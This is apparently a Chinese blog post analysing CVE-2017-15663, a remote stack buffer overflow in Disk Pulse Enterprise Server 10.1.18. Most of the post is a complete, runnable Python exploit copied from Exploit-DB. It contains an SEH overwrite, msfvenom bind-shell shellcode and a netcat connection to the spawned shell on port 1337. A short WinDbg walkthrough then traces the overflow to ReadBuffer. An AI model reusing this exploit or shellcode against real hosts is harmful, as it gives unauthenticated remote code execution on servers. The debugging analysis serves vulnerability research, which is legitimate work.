[CVE-2017-15663]Disk Pulse Enterprise 10.1.18-远程缓冲区溢出漏洞分析
0x00 参考
https://www.exploit-db.com/exploits/43589/
POC:
https://www.exploit-db.com/exploits/43589/
POC:
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow # Exploit Author: Ahmad Mahfouz # Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH # Contact: http://twitter.com/eln1x # Date: 12/01/2018 # CVE: CVE-2017-15663 # Version: v10.1.18 # Tested on: Windows 7 x64 # Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe from struct import pack from os import system from sys import exit from time import sleep import socket port = 9120 host = '192.168.72.231' stage1 = "\x83\xc4\x7f" * 17 # metasm > add esp,127 stage1 + = "\x83\xc4\x04" # metasm > add esp,4 stage1 + = "\xff\xe4" # metasm > jmp esp # msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02' buf = "\x90" * 10 buf + = "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31" buf + = "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f" buf + = "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b" buf + = "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a" buf + = "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d" buf + = "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92" buf + = "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2" buf + = "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a" buf + = "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f" buf + = "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28" buf + = "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27" buf + = "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e" buf + = "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f" buf + = "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87" buf + = "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9" buf + = "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee" buf + = "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e" buf + = "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9" buf + = "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4" buf + = "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e" buf + = "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e" buf + = "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23" buf + = "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26" buf + = "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44" buf + = "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc" buf + = "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62" buf + = "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f" buf + = "\x7d\x58\x6e\x5a" shellcode = buf payload = 'A' * 124 #offset payload + = '\xeb\x09\x90\x90' #jmp over seh retrun value payload + = '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 | {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll) payload + = stage1 payload + = '\x90' * ( 1000 - len (payload) - len (shellcode)) payload + = shellcode header = '\x75\x19\xba\xab' header + = '\x03\x00\x00\x00' header + = '\x00\x40\x00\x00' header + = pack( '<I' , len (payload)) header + = pack( '<I' , len (payload)) header + = pack( '<I' , ord (payload[ - 1 ])) packet = header packet + = payload s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try : print "[*] Testing connection to tatget %s:%s" % (host,port) s.connect((host, port)) except : print "[-] Unable to communicate to target %s:%s" % (host,port) exit() s.send(packet) print "[*] Payload Sent.." print "[*] Connecting to bind shell %s:1337 .." % host sleep( 3 ) system( "nc %s 1337" % host)
0x01 漏洞分析
运行poc到达漏洞现场
栈回溯002f6eee在lib!SCA_NetServerAgent::ThreadFunc,用windbg重新附加进程,
在该函数下断点,运行poc
一直单步跟
liberal!SCA_NetTransport::WaitForMessage主要是分发接收的数据处理
继续单步跟,大概很快就到达造成溢出的地方
可以看到ReadBuffer,其中01a6fa24是在栈中的buf,ReadBuffer后会向01a6fa24指向的那块内存
拷贝数据,0x7d是拷贝的大小
动态获取数据块的大小,通过ReadBuffer把获取到的数据拷贝到buf里,如果获取的数据块很大,就可以溢出了
|
评论
发表评论